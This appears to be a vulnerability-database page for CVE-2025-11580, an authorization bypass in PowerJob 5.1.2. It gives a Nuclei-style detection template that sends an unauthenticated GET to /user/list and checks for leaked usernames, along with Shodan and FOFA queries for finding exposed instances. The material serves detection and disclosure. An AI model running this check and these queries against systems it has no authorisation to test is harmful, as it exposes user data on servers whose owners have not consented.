CVE-2025-11580: PowerJob List - Authorization Bypass

2026-01-24 PowerJob List PoC Public

Description

PowerJob = 5.1.2 contains a broken access control caused by missing authorization in /user/list function, letting remote attackers access unauthorized resources, exploit requires no special privileges.

PoC

id: CVE-2025-11580

info:
  name: PowerJob List - Authorization Bypass
  author: DhiyaneshDk
  severity: medium
  description: |
    PowerJob = 5.1.2 contains a broken access control caused by missing authorization in /user/list function, letting remote attackers access unauthorized resources, exploit requires no special privileges.
  impact: |
    Remote attackers can access unauthorized resources, potentially leading to data exposure or privilege escalation.
  remediation: |
    Update to the latest version beyond 5.1.2.
  reference:
    - https://github.com/PowerJob/PowerJob/issues/1127
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11580
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"PowerJob"
    fofa-query: title="PowerJob"
    product: powerjob
    vendor: powerjob
  tags: cve,cve2025,powerjob,auth-bypass,oss,vuln

http:
  - raw:
      - |
        GET /user/list HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"success":true'
          - '"username":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022046c4433e46327d4aecc1923e6e3b0c2bdfede787709a924d331a863794b8eed7022100dbe5a4fb19ab6c2d1ab07fae4d9c13283ec4182dcdaff9ffcdcd315b00780a1f:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities